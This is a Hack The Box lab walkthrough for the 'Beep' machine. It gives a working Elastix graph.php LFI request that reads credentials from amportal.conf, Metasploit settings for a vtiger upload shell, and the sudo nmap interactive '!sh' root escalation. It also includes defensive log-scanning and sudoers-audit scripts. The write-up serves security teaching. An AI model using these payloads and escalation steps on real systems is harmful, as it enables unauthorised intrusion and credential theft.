Hack the Box – Beep Walkthrough

Today we’re going to solve another CTF machine, “Beep”. It is now a retired box and can be accessed if you’re a VIP member.
Introduction
Specifications
- Target OS: Linux
- Services: 22,25,80,110,111,143,443,993,995,3306,4445,10000
- IP Address: 10.10.10.7
- Difficulty: Medium
Weakness
- LFI vulnerability
- Sudo NOPASSWD
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step is the reconnaissance phase, starting with port scanning.
Ports Scanning
During this step we identify the target and see which services sit behind the IP address.
host        port   proto  name       state  info
----        ----   -----  ----       -----  ----
10.10.10.7  22     tcp    ssh        open   OpenSSH 4.3 protocol 2.0
10.10.10.7  25     tcp    smtp       open   Postfix smtpd
10.10.10.7  80     tcp    http       open   Apache httpd 2.2.3
10.10.10.7  110    tcp    pop3       open   Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  111    tcp    rpcbind    open   2 RPC #100000
10.10.10.7  143    tcp    imap       open   Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
10.10.10.7  443    tcp    ssl/http   open   Apache httpd 2.2.3 (CentOS)
10.10.10.7  993    tcp    ssl/imap   open   Cyrus imapd
10.10.10.7  995    tcp    pop3       open   Cyrus pop3d
10.10.10.7  3306   tcp    mysql      open   MySQL unauthorized
10.10.10.7  4445   tcp    upnotifyp  open
10.10.10.7  10000  tcp    http       open   MiniServ 1.570 Webmin httpd
We have quite a long list of services. HTTP is running, so that is our primary target for now.
Enumerate Directories
We get a huge list of directories because Elastix is installed on Apache.
Let’s searchsploit elastix.
To read the exploit:
searchsploit -x php/webapps/37637.pl
To copy the exploit to the current directory:
searchsploit -m php/webapps/37637.pl .
  Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
      URL: https://www.exploit-db.com/exploits/37637/
     Path: /usr/share/exploitdb/platforms/php/webapps/37637.pl
Copied to: /root/Documents/hackthebox/10.10.10.7/37637.pl
The proof of concept is extremely simple. Browsing to https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action exposes the credentials for AMPortal.
The box is vulnerable to password reuse: the AMPDBPASS value from amportal.conf is also the root password, so it is possible to SSH in directly as root.
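From the defender’s side, the request above leaves a distinctive trace in the web server log. The script below is an added example (not code from the walkthrough): it scans a few constructed Apache access-log lines for the traversal and null-byte pattern used against graph.php, decoding URL encoding twice so double-encoded variants are caught too. The sample lines, LOG_RE and the SENSITIVE_PATHS list are my own constructions.

```python
import re
from urllib.parse import unquote

# Constructed Apache access-log lines (not taken from the target): one request
# matching the graph.php traversal + null-byte PoC, two benign requests, and one
# double-URL-encoded traversal towards /etc/passwd.
SAMPLE_LOG = """\
10.10.14.5 - - [02/Dec/2017:23:30:01 +0000] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action HTTP/1.1" 200 5120
10.10.14.5 - - [02/Dec/2017:23:30:05 +0000] "GET /vtigercrm/index.php?module=Accounts&action=index HTTP/1.1" 200 2210
10.10.14.9 - - [02/Dec/2017:23:31:12 +0000] "GET /vtigercrm/graph.php?current_language=en_us&module=Accounts HTTP/1.1" 200 812
10.10.14.9 - - [02/Dec/2017:23:32:40 +0000] "GET /vtigercrm/graph.php?current_language=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1590
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Files an LFI on this box is typically pointed at; extend for your environment.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "amportal.conf")

def lfi_indicators(target):
    """Return the names of the LFI indicators present in a request target."""
    # Decode twice so single- and double-URL-encoded payloads both normalise.
    decoded = unquote(unquote(target))
    found = []
    if "../" in decoded or "..\\" in decoded:
        found.append("traversal")
    if "\x00" in decoded:
        found.append("null_byte")  # truncates the appended extension on PHP < 5.3.4
    if any(p in decoded for p in SENSITIVE_PATHS):
        found.append("sensitive_path")
    return found

def scan_access_log(text):
    """Return one finding per log line carrying at least one LFI indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        inds = lfi_indicators(m["target"])
        if inds:
            size = int(m["size"]) if m["size"].isdigit() else 0
            findings.append({"src": m["src"], "ts": m["ts"], "status": int(m["status"]),
                             "size": size, "target": m["target"], "indicators": inds})
    return findings

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['status']} {f['size']}B {','.join(f['indicators'])} {f['target']}")
```

A 200 response with a sizeable body on a flagged request is the case worth escalating, since it suggests the include actually returned file contents.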
Method 2
There’s another method to hack this box. Let’s start over.
Port Scanning
The port scan is the same as above: HTTP is running, so it is still our primary target.
Enumerate Directories
We get a huge list of directories because Elastix is installed on Apache.
We have a login field; either we can brute force it or find an SQL injection vulnerability. I tested both but was unable to find them.
Let’s dig more into directories and see if we can find anything.
https://10.10.10.7/vtigercrm/
We can see another login portal, this time for vtiger CRM 5.1.0 🙂 The first thing we should do is searchsploit vtiger.
We also found some Metasploit modules, so let’s test those first to save time.
msf > search vtiger

Matching Modules
================

   Name                                    Disclosure Date  Rank       Description
   ----                                    ---------------  ----       -----------
   exploit/multi/http/vtiger_install_rce   2014-03-05       manual     Vtiger Install Unauthenticated Remote Command Execution
   exploit/multi/http/vtiger_php_exec      2013-10-30       excellent  vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution
   exploit/multi/http/vtiger_soap_upload   2013-03-26       excellent  vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload
We found our exploit; let’s use it.
use exploit/multi/http/vtiger_soap_upload
After running the exploit we got an error; let’s take a look at it.
If you remember, the server also has SSL enabled, and this exploit has an option to support SSL. Let’s enable it and point it at port 443.
msf exploit(vtiger_soap_upload) > set SSL true
msf exploit(vtiger_soap_upload) > set RPORT 443
After running it again we got a shell 🙂
Inside the /home/fanis directory we found the user.txt flag.
Privilege Escalation
It’s time to get root.txt. We can use privilege escalation scripts to gather information, or do some manual research first to save time.
If you run sudo -l you can see many NOPASSWD commands, any of which could lead us to root.
sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
nmap is in the list, and if you google “nmap privilege escalation” you will find this command 🙂
sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cd /root
ls -la
total 16308
drwxr-x---  2 root root     4096 Apr  7  2017 .
drwxr-xr-x 22 root root     4096 Dec  2 23:23 ..
-rw-------  1 root root     1130 Dec  4 13:06 .bash_history
-rw-r--r--  1 root root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root root      100 Jan  6  2007 .cshrc
-rw-r--r--  1 root root      129 Jan  6  2007 .tcshrc
-rw-------  1 root root     6025 Apr  7  2017 anaconda-ks.cfg
-r-xr-xr-x  1 root root   190461 Aug 10  2011 elastix-pr-2.2-1.i386.rpm
-rw-r--r--  1 root root    18433 Apr  7  2017 install.log
-rw-r--r--  1 root root        0 Apr  7  2017 install.log.syslog
-rw-r--r--  1 root root        1 Apr  7  2017 postnochroot
-rw-------  1 root root       33 Apr  7  2017 root.txt
-r-xr-xr-x  1 root root 16358730 Oct 31  2011 webmin-1.570-1.noarch.rpm
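The fix for this escalation path is in the sudoers policy, and the same sudo -l output a pentester reads can be audited automatically. The script below is an added defender-side example (not code from the walkthrough): it parses sudo -l output into entries and reports the root NOPASSWD grants for binaries whose unrestricted use defeats the point of sudo. The sample text is constructed from the output above with the env_keep list and some entries abbreviated; ENTRY_RE and the RISKY table are my own selection.

```python
import re

# Constructed from the `sudo -l` output in the walkthrough (env_keep list and some
# entries abbreviated); not code or data pulled from the target itself.
SUDO_L_OUTPUT = """\
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /usr/sbin/elastix-helper
"""

# One privilege line: "(runas) TAG: TAG: /path/to/command args" or "(runas) ALL"
ENTRY_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$')

# Binaries a service account should never run as root without a password.
RISKY = {
    "nmap": "interactive mode (Nmap 4.x) hands out a shell, as shown above",
    "chmod": "can change the permissions of any file on the system",
    "chown": "can change the ownership of any file on the system",
}

def parse_sudo_l(text):
    """Return (runas, nopasswd, command) triples from `sudo -l` output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:  # Defaults lines never start with "(runas)", so they are skipped
            entries.append((m["runas"].strip(), "NOPASSWD:" in m["tags"], m["cmd"].strip()))
    return entries

def risky_entries(entries):
    """Keep root, password-less entries that are ALL or a RISKY binary, with the reason."""
    out = []
    for runas, nopasswd, cmd in entries:
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if runas == "root" and nopasswd and (cmd == "ALL" or binary in RISKY):
            out.append((cmd, RISKY.get(binary, "unrestricted root")))
    return out

if __name__ == "__main__":
    found = parse_sudo_l(SUDO_L_OUTPUT)
    print(f"{len(found)} sudo entries parsed")
    for cmd, why in risky_entries(found):
        print(f"FLAG {cmd}: {why}")
```

On this box the remedy is to drop the nmap entry (or at least the NOPASSWD tag) and to restrict the remaining grants to the specific arguments the Elastix helper scripts actually need.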